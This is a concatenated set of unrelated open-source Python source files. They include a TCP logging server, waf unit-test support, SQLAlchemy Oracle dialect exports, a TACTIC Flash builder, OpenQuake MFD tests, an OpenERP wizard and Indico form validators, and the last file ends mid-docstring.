| lssfau/walberla | python/waLBerla_tests/test_blockforest.py | Python | gpl-3.0 | 3,743 |
#!/usr/bin/env python
import SocketServer
import time
import sys
class LoggerRequestHandler(SocketServer.BaseRequestHandler):
    # Python 2 handler: streams whatever connected clients send to stdout.
    def setup(self):
        print self.client_address, 'connected!'
    def handle(self):
        # NOTE(review): recv() returning '' means the peer disconnected, but
        # this loop keeps spinning (and sleeping) forever; consider breaking
        # when no data is returned.
        while 1:
            time.sleep(0.01)  # throttle the polling loop
            data = self.request.recv(1024)
            if len(data) > 0:
                sys.stdout.write(data)
    def finish(self):
        print self.client_address, 'disconnected!'
if __name__=='__main__':
    # allow_reuse_address avoids "address already in use" on quick restarts.
    SocketServer.ThreadingTCPServer.allow_reuse_address = True
    server = SocketServer.ThreadingTCPServer(('', 4444), LoggerRequestHandler)
    server.serve_forever()
| avroshk/VRDAW | VRDAW_working/LogServer.py | Python | gpl-3.0 | 648 |
#!/usr/bin/env python
# encoding: utf-8
# Carlos Rafael Giani, 2006
"""
Unit tests run in the shutdown() method, and for c/c++ programs
One should NOT have to give parameters to programs to execute
In the shutdown method, add the following code:
>>> def shutdown():
... ut = UnitTest.unit_test()
... ut.run()
... ut.print_results()
Each object to use as a unit test must be a program and must have X{obj.unit_test=1}
"""
import os, sys
import Build, TaskGen, Utils, Options, Logs, Task
from TaskGen import before, after, feature
from Constants import *
class unit_test(object):
	"Unit test representation"
	def __init__(self):
		self.returncode_ok = 0 # Unit test returncode considered OK. All returncodes differing from this one
		# will cause the unit test to be marked as "FAILED".
		# The following variables are filled with data by run().
		# print_results() uses these for printing the unit test summary,
		# but if there is need for direct access to the results,
		# they can be retrieved here, after calling run().
		self.num_tests_ok = 0 # Number of successful unit tests
		self.num_tests_failed = 0 # Number of failed unit tests
		self.num_tests_err = 0 # Tests that have not even run
		self.total_num_tests = 0 # Total amount of unit tests
		self.max_label_length = 0 # Maximum label length (pretty-print the output)
		self.unit_tests = Utils.ordered_dict() # Unit test dictionary. Key: the label (unit test filename relative
		# to the build dir), value: unit test filename with absolute path
		self.unit_test_results = {} # Dictionary containing the unit test results.
		# Key: the label, value: result (true = success false = failure)
		self.unit_test_erroneous = {} # Dictionary indicating erroneous unit tests.
		# Key: the label, value: true = unit test has an error false = unit test is ok
		self.change_to_testfile_dir = False #True if the test file needs to be executed from the same dir
		self.want_to_see_test_output = False #True to see the stdout from the testfile (for example check suites)
		self.want_to_see_test_error = False #True to see the stderr from the testfile (for example check suites)
		self.run_if_waf_does = 'check' #build was the old default
	def run(self):
		"Run the unit tests and gather results (note: no output here)"
		# Reset all counters so run() can be invoked more than once.
		self.num_tests_ok = 0
		self.num_tests_failed = 0
		self.num_tests_err = 0
		self.total_num_tests = 0
		self.max_label_length = 0
		self.unit_tests = Utils.ordered_dict()
		self.unit_test_results = {}
		self.unit_test_erroneous = {}
		ld_library_path = []
		# If waf is not building, don't run anything
		if not Options.commands[self.run_if_waf_does]: return
		# Get the paths for the shared libraries, and obtain the unit tests to execute
		for obj in Build.bld.all_task_gen:
			try:
				link_task = obj.link_task
			except AttributeError:
				pass
			else:
				lib_path = link_task.outputs[0].parent.abspath(obj.env)
				if lib_path not in ld_library_path:
					ld_library_path.append(lib_path)
			unit_test = getattr(obj, 'unit_test', '')
			if unit_test and 'cprogram' in obj.features:
				try:
					output = obj.path
					filename = os.path.join(output.abspath(obj.env), obj.target)
					srcdir = output.abspath()
					label = os.path.join(output.bldpath(obj.env), obj.target)
					self.max_label_length = max(self.max_label_length, len(label))
					self.unit_tests[label] = (filename, srcdir)
				except KeyError:
					pass
		self.total_num_tests = len(self.unit_tests)
		# Now run the unit tests
		Utils.pprint('GREEN', 'Running the unit tests')
		count = 0
		result = 1
		for label in self.unit_tests.allkeys:
			file_and_src = self.unit_tests[label]
			filename = file_and_src[0]
			srcdir = file_and_src[1]
			count += 1
			line = Build.bld.progress_line(count, self.total_num_tests, Logs.colors.GREEN, Logs.colors.NORMAL)
			if Options.options.progress_bar and line:
				sys.stderr.write(line)
				sys.stderr.flush()
			try:
				kwargs = {}
				kwargs['env'] = os.environ.copy()
				if self.change_to_testfile_dir:
					kwargs['cwd'] = srcdir
				if not self.want_to_see_test_output:
					kwargs['stdout'] = Utils.pproc.PIPE # PIPE for ignoring output
				if not self.want_to_see_test_error:
					kwargs['stderr'] = Utils.pproc.PIPE # PIPE for ignoring output
				if ld_library_path:
					v = kwargs['env']
					# Prepend the freshly built library paths so the test
					# binaries resolve their own shared libraries.
					def add_path(dct, path, var):
						dct[var] = os.pathsep.join(Utils.to_list(path) + [os.environ.get(var, '')])
					if sys.platform == 'win32':
						add_path(v, ld_library_path, 'PATH')
					elif sys.platform == 'darwin':
						add_path(v, ld_library_path, 'DYLD_LIBRARY_PATH')
						add_path(v, ld_library_path, 'LD_LIBRARY_PATH')
					else:
						add_path(v, ld_library_path, 'LD_LIBRARY_PATH')
				pp = Utils.pproc.Popen(filename, **kwargs)
				pp.wait()
				result = int(pp.returncode == self.returncode_ok)
				if result:
					self.num_tests_ok += 1
				else:
					self.num_tests_failed += 1
				self.unit_test_results[label] = result
				self.unit_test_erroneous[label] = 0
			except OSError:
				# The test binary could not be launched at all.
				self.unit_test_erroneous[label] = 1
				self.num_tests_err += 1
			except KeyboardInterrupt:
				pass
		if Options.options.progress_bar: sys.stdout.write(Logs.colors.cursor_on)
	def print_results(self):
		"Pretty-prints a summary of all unit tests, along with some statistics"
		# If waf is not building, don't output anything
		if not Options.commands[self.run_if_waf_does]: return
		p = Utils.pprint
		# Early quit if no tests were performed
		if self.total_num_tests == 0:
			p('YELLOW', 'No unit tests present')
			return
		for label in self.unit_tests.allkeys:
			filename = self.unit_tests[label]
			err = 0
			result = 0
			try: err = self.unit_test_erroneous[label]
			except KeyError: pass
			try: result = self.unit_test_results[label]
			except KeyError: pass
			# Pad with dots so the OK/FAILED/ERROR column lines up.
			n = self.max_label_length - len(label)
			if err: n += 4
			elif result: n += 7
			else: n += 3
			line = '%s %s' % (label, '.' * n)
			if err: p('RED', '%sERROR' % line)
			elif result: p('GREEN', '%sOK' % line)
			else: p('YELLOW', '%sFAILED' % line)
		percentage_ok = float(self.num_tests_ok) / float(self.total_num_tests) * 100.0
		percentage_failed = float(self.num_tests_failed) / float(self.total_num_tests) * 100.0
		percentage_erroneous = float(self.num_tests_err) / float(self.total_num_tests) * 100.0
		p('NORMAL', '''
	Successful tests:      %i (%.1f%%)
	Failed tests:          %i (%.1f%%)
	Erroneous tests:       %i (%.1f%%)
	Total number of tests: %i
''' % (self.num_tests_ok, percentage_ok, self.num_tests_failed, percentage_failed,
		self.num_tests_err, percentage_erroneous, self.total_num_tests))
		p('GREEN', 'Unit tests finished')
############################################################################################
"""
New unit test system
The targets with feature 'test' are executed after they are built
bld(features='cprogram cc test', ...)
To display the results:
import UnitTest
bld.add_post_fun(UnitTest.summary)
"""
import threading
testlock = threading.Lock()  # serializes test execution and result collection
@feature('test')
@after('apply_link', 'vars_target_cprogram')
def make_test(self):
	# Task generator method: schedule a 'utest' task right after linking so
	# the freshly built program is executed as a unit test.
	if not 'cprogram' in self.features:
		Logs.error('test cannot be executed %s' % self)
		return
	self.default_install_path = None
	tsk = self.create_task('utest')
	tsk.set_inputs(self.link_task.outputs)
def exec_test(self):
	# Body of the 'utest' task (Python 2 syntax): runs one test binary and
	# appends (filename, failed?, output) to bld.utest_results.
	testlock.acquire()
	fail = False
	try:
		filename = self.inputs[0].abspath(self.env)
		try:
			fu = getattr(self.generator.bld, 'all_test_paths')
		except AttributeError:
			# First test of this build: compute the library search paths
			# once and cache them on the build context.
			fu = os.environ.copy()
			self.generator.bld.all_test_paths = fu
			lst = []
			for obj in self.generator.bld.all_task_gen:
				link_task = getattr(obj, 'link_task', None)
				if link_task:
					lst.append(link_task.outputs[0].parent.abspath(obj.env))
			def add_path(dct, path, var):
				dct[var] = os.pathsep.join(Utils.to_list(path) + [os.environ.get(var, '')])
			if sys.platform == 'win32':
				add_path(fu, lst, 'PATH')
			elif sys.platform == 'darwin':
				add_path(fu, lst, 'DYLD_LIBRARY_PATH')
				add_path(fu, lst, 'LD_LIBRARY_PATH')
			else:
				add_path(fu, lst, 'LD_LIBRARY_PATH')
		try:
			ret = Utils.cmd_output(filename, cwd=self.inputs[0].parent.abspath(self.env), env=fu)
		except Exception, e:
			# Any failure (non-zero exit, spawn error) marks the test failed
			# and records the exception text as its output.
			fail = True
			ret = '' + str(e)
		else:
			pass
		stats = getattr(self.generator.bld, 'utest_results', [])
		stats.append((filename, fail, ret))
		self.generator.bld.utest_results = stats
	finally:
		testlock.release()
# Register 'utest' as a task class and patch its scheduling so --alltests
# forces every test to re-run even when its inputs are unchanged.
cls = Task.task_type_from_func('utest', func=exec_test, color='RED', ext_in='.bin')
old = cls.runnable_status
def test_status(self):
	if getattr(Options.options, 'all_tests', False):
		return RUN_ME
	return old(self)
cls.runnable_status = test_status
cls.quiet = 1
def summary(bld):
	# Post-build callback: print one OK/FAIL line per executed test, plus
	# the captured output of every failing test.
	lst = getattr(bld, 'utest_results', [])
	if lst:
		Utils.pprint('CYAN', 'execution summary')
		for (f, fail, ret) in lst:
			col = fail and 'RED' or 'GREEN'
			Utils.pprint(col, (fail and 'FAIL' or 'ok') + " " + f)
			if fail: Utils.pprint('NORMAL', ret.replace('\\n', '\n'))
def set_options(opt):
	# Adds the --alltests command line flag (see test_status above).
	opt.add_option('--alltests', action='store_true', default=False, help='Exec all unit tests', dest='all_tests')
| jubos/meguro | tools/wafadmin/Tools/UnitTest.py | Python | mit | 9,155 |
# oracle/__init__.py
# Copyright (C) 2005-2011 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from sqlalchemy.dialects.oracle import base, cx_oracle, zxjdbc

# cx_oracle is the default DBAPI implementation for the oracle dialect.
base.dialect = cx_oracle.dialect

from sqlalchemy.dialects.oracle.base import \
    VARCHAR, NVARCHAR, CHAR, DATE, DATETIME, NUMBER,\
    BLOB, BFILE, CLOB, NCLOB, TIMESTAMP, RAW,\
    FLOAT, DOUBLE_PRECISION, LONG, dialect, INTERVAL,\
    VARCHAR2, NVARCHAR2, ROWID
# BUG FIX: 'ROWID' was listed in __all__ but never imported above, which
# made `from sqlalchemy.dialects.oracle import *` raise AttributeError.
__all__ = (
    'VARCHAR', 'NVARCHAR', 'CHAR', 'DATE', 'DATETIME', 'NUMBER',
    'BLOB', 'BFILE', 'CLOB', 'NCLOB', 'TIMESTAMP', 'RAW',
    'FLOAT', 'DOUBLE_PRECISION', 'LONG', 'dialect', 'INTERVAL',
    'VARCHAR2', 'NVARCHAR2', 'ROWID'
)
| eunchong/build | third_party/sqlalchemy_0_7_1/sqlalchemy/dialects/oracle/__init__.py | Python | bsd-3-clause | 785 |
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
# Public API of this module.
__all__ = ['FlashBuilder']
import os, sys, urllib, xmlrpclib
from xml.dom.minidom import parseString
from pyasm.application.common import SessionBuilder
from flash_environment import FlashEnvironment
from flash_info import FlashInfo
from flash import Flash
class FlashBuilder(SessionBuilder):
    '''Builds jsfl command batches and drives Flash to load, publish and
    render files for the current session.'''

    def __init__(self):
        super(FlashBuilder,self).__init__()
        self.info = FlashInfo.get()
        self.is_initialized = False

    def init(self):
        '''Download the shared jsfl scripts once and cache the session paths.

        Returns the list of jsfl snippets (the common include) that must be
        prepended to the first command batch; returns an empty list on
        subsequent calls.
        '''
        jsfl_list = []
        if self.is_initialized:
            return jsfl_list
        # instantiate the session
        #server = self.env.get_server_url()
        server = "http://fugu"
        self.info.download("%s/context/JSFL/common.jsfl" % server)
        self.load_jsfl = self.info.download("%s/context/JSFL/load2.jsfl" % server)
        self.publish_jsfl = self.info.download("%s/context/JSFL/publish2.jsfl" % server)
        self.render_jsfl = self.info.download("%s/context/JSFL/render.jsfl" % server)
        self.sandbox_path = self.info.get_sandbox_dir()
        self.log_path = self.info.get_log_path()
        self.publish_dir = self.info.get_publish_dir()
        # load the appropriate jsfl files
        jsfl = self.app.get_jsfl(self.load_jsfl, "include", "common.jsfl", self.info.get_tmp_dir())
        jsfl_list.append(jsfl)
        # BUG FIX: this previously read "self.is_initialized == True", a
        # no-op comparison, so every call re-downloaded the jsfl scripts.
        self.is_initialized = True
        return jsfl_list

    def check_existence(self, tactic_node_name):
        ''' check if this node exist '''
        pass

    def load_file(self, path, node_name):
        '''Load a file into the application under the given node name.'''
        self.app.load(path, node_name)

    def import_file(self, node_name, path, instantiation='import', use_namespace=True):
        '''Import a file into the session and build the init-session jsfl.'''
        self.app.import_file( node_name, path, instantiation, load_mode='merge',use_namespace=True)
        #self.render()
        # BUG FIX: jsfl_list was referenced below without ever being defined,
        # which raised a NameError whenever this method was called.
        jsfl_list = self.init()
        # initialize the session
        load_mode="merge"
        #load_mode="simple"
        prefix_mode = ""
        jsfl = self.app.get_jsfl(self.load_jsfl, "init_session", load_mode, prefix_mode,\
            self.log_path, self.sandbox_path)
        jsfl_list.append(jsfl)
        # NOTE(review): the assembled jsfl is built but never executed here;
        # confirm whether run_jsfl should be invoked as in publish_file().
        return jsfl_list

    def publish_file(self, asset_code, node_name):
        '''Publish the asset, executing the full jsfl batch in Flash.'''
        # for flash asset code is node name
        jsfl_list = self.init()
        jsfl = self.app.get_jsfl(self.publish_jsfl, "publish_asset", asset_code,\
            self.publish_dir, self.log_path)
        jsfl_list.append(jsfl)
        # execute all of the jsfl commands
        jsfl_final = "\n".join(jsfl_list)
        print(jsfl_final)
        self.app.run_jsfl(jsfl_final)

    def close_files(self):
        '''Close all files currently open in the application.'''
        self.app.close_files()

    def render(self):
        '''Render every layer to png files under the session temp directory.'''
        jsfl_list = self.init()
        tmp_dir = self.env.get_tmp_dir()
        # render
        file_format = "png"
        render_dir = "%s/render" % tmp_dir
        prefix = ""
        jsfl = self.app.get_jsfl(self.render_jsfl, "render_layer", prefix, file_format, render_dir, self.log_path)
        jsfl_list.append(jsfl)
        jsfl_final = "\n".join(jsfl_list)
        print("jsfl_final: ", jsfl_final)
        self.app.run_jsfl(jsfl_final)
| Southpaw-TACTIC/TACTIC | src/pyasm/application/flash/flash_builder.py | Python | epl-1.0 | 3,514 |
# The Hazard Library
# Copyright (C) 2012-2022 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from openquake.hazardlib.mfd import EvenlyDiscretizedMFD
from openquake.hazardlib.tests.mfd.base_test import BaseMFDTestCase
class EvenlyDiscretizedMFDMFDConstraintsTestCase(BaseMFDTestCase):
    """Constraint checks performed by the EvenlyDiscretizedMFD constructor."""

    def _assert_error(self, message, **kwargs):
        # Construct with the given kwargs and check the exact error text.
        exc = self.assert_mfd_error(EvenlyDiscretizedMFD, **kwargs)
        self.assertEqual(str(exc), message)

    def test_empty_occurrence_rates(self):
        self._assert_error('at least one bin must be specified',
                           min_mag=1, bin_width=2, occurrence_rates=[])

    def test_negative_occurrence_rate(self):
        self._assert_error('all occurrence rates must not be negative',
                           min_mag=1, bin_width=2, occurrence_rates=[-0.1, 1])

    def test_all_zero_occurrence_rates(self):
        self._assert_error('at least one occurrence rate must be positive',
                           min_mag=1, bin_width=2, occurrence_rates=[0, 0])

    def test_negative_minimum_magnitude(self):
        self._assert_error('minimum magnitude must be non-negative',
                           min_mag=-1, bin_width=2, occurrence_rates=[0.1, 1])

    def test_negative_bin_width(self):
        self._assert_error('bin width must be positive',
                           min_mag=1, bin_width=-2, occurrence_rates=[0.1, 1])
class EvenlyDiscretizedMFDTestCase(BaseMFDTestCase):
    """Behavioural tests for valid :class:`EvenlyDiscretizedMFD` instances."""

    def test_zero_min_mag(self):
        # A minimum magnitude of zero is a valid (non-negative) value.
        mfd = EvenlyDiscretizedMFD(min_mag=0, bin_width=1,
                                   occurrence_rates=[1])
        self.assertEqual(mfd.get_annual_occurrence_rates(), [(0, 1)])
        self.assertEqual(mfd.get_min_max_mag(), (0, 0))

    def test_zero_rate(self):
        # Individual bins may have a zero rate as long as one is positive.
        mfd = EvenlyDiscretizedMFD(min_mag=1, bin_width=2,
                                   occurrence_rates=[4, 0, 5])
        expected = [(1, 4), (3, 0), (5, 5)]
        self.assertEqual(mfd.get_annual_occurrence_rates(), expected)

    def test(self):
        # Rates are paired with bin-center magnitudes spaced by bin_width.
        mfd = EvenlyDiscretizedMFD(min_mag=0.2, bin_width=0.3,
                                   occurrence_rates=[2.1, 2.4, 5.3])
        expected = [(0.2, 2.1), (0.5, 2.4), (0.8, 5.3)]
        self.assertEqual(mfd.get_annual_occurrence_rates(), expected)
        self.assertEqual(mfd.get_min_max_mag(), (0.2, 0.8))
class EvenlyDiscretizedMFDModifyTestCase(BaseMFDTestCase):
    """Tests for the ``modify('set_mfd', ...)`` modification.

    Bug fix: this class was previously also named
    ``EvenlyDiscretizedMFDTestCase``, which shadowed the earlier class of
    the same name so that class's tests were never collected or run.
    Renaming restores discovery of both test cases without changing any
    test behaviour.
    """
    def test_modify_mfd(self):
        # set_mfd replaces all three parameters atomically.
        mfd = EvenlyDiscretizedMFD(min_mag=4.0, bin_width=0.1,
                                   occurrence_rates=[1, 2, 3])
        mfd.modify(
            "set_mfd",
            {"min_mag": 4.5, "bin_width": 0.2, "occurrence_rates": [4, 5, 6]})
        self.assertAlmostEqual(mfd.min_mag, 4.5)
        self.assertAlmostEqual(mfd.bin_width, 0.2)
        self.assertListEqual(mfd.occurrence_rates, [4, 5, 6])
    def test_modify_mfd_constraints(self):
        # The constructor constraints also apply to modified parameters.
        mfd = EvenlyDiscretizedMFD(min_mag=4.0, bin_width=0.1,
                                   occurrence_rates=[1, 2, 3])
        exc = self.assert_mfd_error(
            mfd.modify,
            "set_mfd",
            {"min_mag": 4.0, "bin_width": 0.1, "occurrence_rates": [-1, 2, 3]})
        self.assertEqual(str(exc), 'all occurrence rates must not be negative')
| gem/oq-engine | openquake/hazardlib/tests/mfd/evenly_discretized_test.py | Python | agpl-3.0 | 4,199 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 2010-2012 Elico Corp. All Rights Reserved.
# Author: Yannick Gouin <yannick.gouin@elico-corp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import osv, fields
class arrange_time(osv.osv_memory):
    """Wizard assigning a delivery time slot ('dts') to the selected pickings.

    For every picking in the active selection it also creates a matching
    delivery route line so the picking appears in the route planning.
    """
    _name = 'arrange.time'
    _columns = {
        # Only time records of type 'dts' (delivery time slot) may be chosen.
        'dts_id' : fields.many2one('delivery.time', 'Time', required=True, domain=[('type', '=', 'dts')]),
    }
    def confirm_add(self, cr, uid, ids, context=None):
        """Write the chosen slot onto every picking in ``context['active_ids']``.

        :returns: action dict that closes the wizard window.
        """
        data = self.browse(cr, uid, ids)[0]
        # NOTE(review): assumes the wizard is always launched with
        # 'active_ids' present in the context -- raises KeyError otherwise.
        picking_ids = context['active_ids']
        picking_obj = self.pool.get('stock.picking')
        line_obj = self.pool.get('delivery.route.line')
        #TODO give warning to limit the rewrite!!
        picking_obj.write(cr, uid, picking_ids, {'dts_id':data.dts_id.id})
        # One route line per picking, so each shows up in the delivery route.
        for picking_id in picking_ids:
            line_obj.create(cr, uid, {'picking_id':picking_id}, context=context)
        return {
            'type': 'ir.actions.act_window_close',
        }
arrange_time()
| jmesteve/openerp | openerp/addons/delivery_routes/wizard/stock.py | Python | agpl-3.0 | 1,876 |
# This file is part of Indico.
# Copyright (C) 2002 - 2016 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import re
from datetime import timedelta
from wtforms.validators import StopValidation, ValidationError, EqualTo, Regexp
from indico.util.date_time import as_utc, format_datetime, format_time, now_utc, format_human_timedelta
from indico.util.i18n import _, ngettext
from indico.util.string import is_valid_mail
class UsedIf(object):
    """Makes a WTF field "used" if a given condition evaluates to True.

    The condition may be a constant boolean or a callable taking
    ``(form, field)``.  If the field is not used, validation stops.
    """
    field_flags = ('conditional',)

    def __init__(self, condition):
        self.condition = condition

    def __call__(self, form, field):
        cond = self.condition
        # Static booleans are used as-is; anything else is called lazily.
        if cond in (True, False):
            used = bool(cond)
        else:
            used = bool(cond(form, field))
        if not used:
            # Discard any errors collected so far and skip remaining validators.
            field.errors[:] = []
            raise StopValidation()
class HiddenUnless(object):
    """Hides and disables a field unless another field has a certain value.
    :param field: The name of the other field to check
    :param value: The value to check for. If unspecified, any truthy
                  value is accepted.
    :param preserve_data: If True, a disabled field will keep whatever
                          ``object_data`` it had before (i.e. data set
                          via `FormDefaults`).
    """
    field_flags = ('initially_hidden',)
    def __init__(self, field, value=None, preserve_data=False):
        self.field = field
        self.value = value
        self.preserve_data = preserve_data
    def __call__(self, form, field):
        value = form[self.field].data
        # Active when the other field is truthy (no target configured) or
        # matches the configured target value exactly.
        active = (value and self.value is None) or (value == self.value and self.value is not None)
        if not active:
            field.errors[:] = []
            if field.raw_data:
                # A disabled/hidden field must never receive submitted data.
                raise ValidationError("Received data for disabled field")
            if not self.preserve_data:
                # Clear existing data and use field default empty value
                field.data = None
                field.process_formdata([])
            else:
                # Clear existing data (just in case) and use the existing data for the field
                field.data = None
                field.process_data(field.object_data)
            raise StopValidation()
class Exclusive(object):
    """Makes a WTF field mutually exclusive with other fields.

    If any of the given fields have a value, the validated field may not have one.
    """

    def __init__(self, *fields):
        self.fields = fields

    def __call__(self, form, field):
        # Nothing to check if this field itself carries no value.
        if field.data is None:
            return
        has_conflict = any(form[name].data is not None for name in self.fields)
        if not has_conflict:
            return
        # List *all* exclusive fields in the message, sorted by label.
        field_names = sorted(unicode(form[name].label.text) for name in self.fields)
        msg = ngettext(u'This field is mutually exclusive with another field: {}',
                       u'This field is mutually exclusive with other fields: {}',
                       len(field_names))
        raise ValidationError(msg.format(u', '.join(field_names)))
class ConfirmPassword(EqualTo):
    """``EqualTo`` validator preconfigured for password-confirmation fields."""

    def __init__(self, fieldname):
        mismatch_msg = _('The passwords do not match.')
        super(ConfirmPassword, self).__init__(fieldname, message=mismatch_msg)
class IndicoEmail(object):
    """Validates one or more email addresses"""

    def __init__(self, multi=False):
        # `multi` allows a comma-separated list instead of a single address.
        self.multi = multi

    def __call__(self, form, field):
        data = field.data
        # Empty values are considered valid; presence is another validator's job.
        if not data or is_valid_mail(data, self.multi):
            return
        if self.multi:
            raise ValidationError(_(u'Invalid email address list'))
        raise ValidationError(_(u'Invalid email address'))
class DateTimeRange(object):
    """Validates a datetime is within the specified boundaries"""
    field_flags = ('datetime_range',)
    def __init__(self, earliest='now', latest=None):
        # Each bound may be a datetime, a callable(form, field), the string
        # 'now', or None/falsy for "unbounded".
        self.earliest = earliest
        self.latest = latest
        # set to true in get_earliest/get_latest if applicable
        self.earliest_now = False
        self.latest_now = False
    def __call__(self, form, field):
        if field.data is None:
            return
        field_dt = as_utc(field.data)
        earliest_dt = self.get_earliest(form, field)
        latest_dt = self.get_latest(form, field)
        # Only complain about values the user actually changed.
        if field_dt != field.object_data:
            if earliest_dt and field_dt < earliest_dt:
                # Special-case the 'now' bound for a friendlier message.
                if self.earliest_now:
                    msg = _("'{}' can't be in the past ({})").format(field.label, field.timezone)
                else:
                    dt = format_datetime(earliest_dt, timezone=field.timezone)
                    msg = _("'{}' can't be before {} ({})").format(field.label, dt, field.timezone)
                raise ValidationError(msg)
            if latest_dt and field_dt > latest_dt:
                if self.latest_now:
                    msg = _("'{}' can't be in the future ({})").format(field.label, field.timezone)
                else:
                    dt = format_datetime(latest_dt, timezone=field.timezone)
                    msg = _("'{}' can't be after {} ({})").format(field.label, dt, field.timezone)
                raise ValidationError(msg)
    def get_earliest(self, form, field):
        """Resolve the lower bound to a UTC datetime (or a falsy value)."""
        earliest = self.earliest(form, field) if callable(self.earliest) else self.earliest
        if earliest == 'now':
            self.earliest_now = True
            # Truncate to the minute so "now" comparisons ignore seconds.
            return now_utc().replace(second=0, microsecond=0)
        return as_utc(earliest) if earliest else earliest
    def get_latest(self, form, field):
        """Resolve the upper bound to a UTC datetime (or a falsy value)."""
        latest = self.latest(form, field) if callable(self.latest) else self.latest
        if latest == 'now':
            self.latest_now = True
            # Pad to the end of the minute so the current minute is allowed.
            return now_utc().replace(second=59, microsecond=999)
        return as_utc(latest) if latest else latest
class LinkedDateTime(object):
    """Validates a datetime field happens before or/and after another.

    If both ``not_before`` and ``not_after`` are set to ``True``, both fields have to
    be equal.

    :param field: Name of the other datetime field to compare against.
    :param not_before: If True, this field may not be earlier than the linked field.
    :param not_after: If True, this field may not be later than the linked field.
    :param not_equal: If True, this field may not be equal to the linked field.
    :raises ValueError: if both ``not_before`` and ``not_after`` are False.
    """
    field_flags = ('linked_datetime',)

    def __init__(self, field, not_before=True, not_after=False, not_equal=False):
        if not not_before and not not_after:
            raise ValueError("Invalid validation")
        self.not_before = not_before
        self.not_after = not_after
        self.not_equal = not_equal
        self.linked_field = field

    def __call__(self, form, field):
        # Nothing to compare if either field is empty.
        if field.data is None:
            return
        linked_field = form[self.linked_field]
        if linked_field.data is None:
            return
        linked_field_dt = as_utc(linked_field.data)
        field_dt = as_utc(field.data)
        # Bug fix: messages previously read "can't be before than" /
        # "can't be after than" -- the stray "than" was ungrammatical.
        if self.not_before and field_dt < linked_field_dt:
            raise ValidationError(_("{} can't be before {}").format(field.label, linked_field.label))
        if self.not_after and field_dt > linked_field_dt:
            raise ValidationError(_("{} can't be after {}").format(field.label, linked_field.label))
        if self.not_equal and field_dt == linked_field_dt:
            raise ValidationError(_("{} can't be equal to {}").format(field.label, linked_field.label))
def used_if_not_synced(form, field):
    """Validator to prevent validation error on synced inputs.

    Synced inputs are disabled in the form and don't send any value.
    In that case, we disable validation from the input.
    """
    # Fields that are not synced validate normally.
    if field.short_name not in form.synced_fields:
        return
    field.errors[:] = []
    raise StopValidation()
class UsedIfChecked(UsedIf):
    """``UsedIf`` variant keyed on the checked state of another field."""

    def __init__(self, field_name):
        # The condition reads the referenced field's data at validation time.
        super(UsedIfChecked, self).__init__(
            lambda form, field: form._fields.get(field_name).data)
class MaxDuration(object):
    """Validates if TimeDeltaField value doesn't exceed `max_duration`"""

    def __init__(self, max_duration=None, **kwargs):
        # Accept either an explicit timedelta or timedelta(**kwargs), not both.
        assert max_duration or kwargs
        assert max_duration is None or not kwargs
        if max_duration is None:
            max_duration = timedelta(**kwargs)
        self.max_duration = max_duration

    def __call__(self, form, field):
        duration = field.data
        if duration is None or duration <= self.max_duration:
            return
        raise ValidationError(_('Duration cannot exceed {}').format(format_human_timedelta(self.max_duration)))
class TimeRange(object):
    """Validate the time lies within boundaries."""
    def __init__(self, earliest=None, latest=None):
        assert earliest is not None or latest is not None, "At least one of `earliest` or `latest` must be specified."
        if earliest is not None and latest is not None:
            assert earliest <= latest, "`earliest` cannot be later than `latest`."
        self.earliest = earliest
        self.latest = latest
    def __call__(self, form, field):
        def _format_time(value):
            # Human-readable time, or None when the bound is unset.
            return format_time(value) if value else None
        if self.earliest and field.data < self.earliest or self.latest and field.data > self.latest:
            # Pick the message that matches which bounds are configured.
            if self.earliest is not None and self.latest is not None:
                message = _("Must be between {earliest} and {latest}.")
            elif self.latest is None:
                message = _("Must be later than {earliest}.")
            else:
                message = _("Must be earlier than {latest}.")
            raise ValidationError(message.format(earliest=_format_time(self.earliest), latest=_format_time(self.latest)))
class WordCount(object):
    """Validates the word count of a string.
    :param min: The minimum number of words in the string. If not
                provided, the minimum word count will not be checked.
    :param max: The maximum number of words in the string. If not
                provided, the maximum word count will not be checked.
    """
    def __init__(self, min=-1, max=-1):
        assert min != -1 or max != -1, 'At least one of `min` or `max` must be specified.'
        assert max == -1 or min <= max, '`min` cannot be more than `max`.'
        self.min = min
        self.max = max
    def __call__(self, form, field):
        # Words are \w+ runs; empty/None data counts as zero words.
        count = len(re.findall(r'\w+', field.data)) if field.data else 0
        if count < self.min or self.max != -1 and count > self.max:
            if self.max == -1:
                message = ngettext('Field must contain at least {min} word.',
                                   'Field must contain at least {min} words.', self.min)
            elif self.min == -1:
                message = ngettext('Field cannot contain more than {max} word.',
                                   'Field cannot contain more than {max} words.', self.max)
            else:
                message = _('Field must have between {min} and {max} words.')
            raise ValidationError(message.format(min=self.min, max=self.max, length=count))
class IndicoRegexp(Regexp):
    """
